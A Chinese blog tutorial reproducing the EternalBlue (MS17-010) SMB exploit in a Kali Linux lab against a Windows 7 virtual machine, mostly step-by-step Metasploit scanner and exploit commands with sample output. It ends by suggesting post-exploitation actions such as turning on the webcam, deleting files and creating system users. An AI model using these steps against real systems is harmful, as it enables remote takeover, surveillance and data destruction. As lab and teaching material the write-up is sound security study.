网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)

       WannaCry勒索病毒席卷全球,一旦中了WannaCry病毒电脑文件会被“加密劫持”,黑客要求受害者支付高昂赎金(比特币)才能拿到解密秘钥。 而这枚WannaCry勒索病毒,就是黑客拿着美国安全局泄露的永恒之蓝攻击代码进行研制,并进行大肆勒索传播。

MS17-010是Windows SMBv1服务中存在的远程代码执行漏洞;
   • 开启SMB服务( 445端口) 的的系统可被执行远程代码, 从而导致被远程控制;
   • 受影响系统: Windows XP、 Windows 7/8/10、 Server 2003/2008/2012/2016

只要用户打上MS17-010这个补丁,就可以避免这次攻击。

需准备环境:Kali-Linux、Windows 7 虚拟机

Kali-Linux :192.168.100.129

Windows 7: 192.168.100.131(确保处在同个网络下,能互相ping通)

第一步:

①输入命令“msfconsole” ,进入metasploit渗透测试框架

②输入命令“search ms17-010”,搜索ms17-010相关漏洞利用代码

       这里可以得到两个工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,exploit/windows/smb/ms17_010_eternalblue是永恒之蓝渗透代码,前者先扫描,若显示有漏洞,再进行渗透。

第二步:

       使用相对应的命令行,使用ms17-010扫描模块对靶机Win7进行扫描,才能进行下一步的渗透操作。

msf5 > use 1   //使用ms17-010扫描模块,对靶机Win7进行扫描
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.86.132   //设置目标IP或网段
RHOST => 192.168.86.132
msf5 auxiliary(scanner/smb/smb_ms17_010) > run   //执行扫描

[+] 192.168.86.132:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)   //说明扫描到的这台win 7存在ms17-010漏洞
[*] 192.168.86.132:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) > back

第三步: 

      使用ms17-010渗透模块对靶机Win7进行渗透

msf5 > use 2   //使用ms17-010渗透模块对靶机Win7进行渗透
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options  //查看可设置的选项
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.86.132
RHOST => 192.168.86.132   //设置渗透目标IP
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit   //执行渗透

       看到“C:\Windows\system32>”就说明拿到了Win7的Shell,漏洞攻击已经成功,接下来要做的就是后渗透攻击,之后便可以通过Shell对目标靶机进行控制,后渗透测试中会有很多好玩的指令操作,如打开摄像头,删除文件,删除目标主机目录,创建系统用户等等。

后渗透测试一: 删除靶机的文件

 后渗透测试二: 新建系统用户,远程控制靶机

 

 

 

 

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
©️2022 CSDN 皮肤主题:大白 设计师:CSDN官方博客 返回首页

打赏作者

_DDDws

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值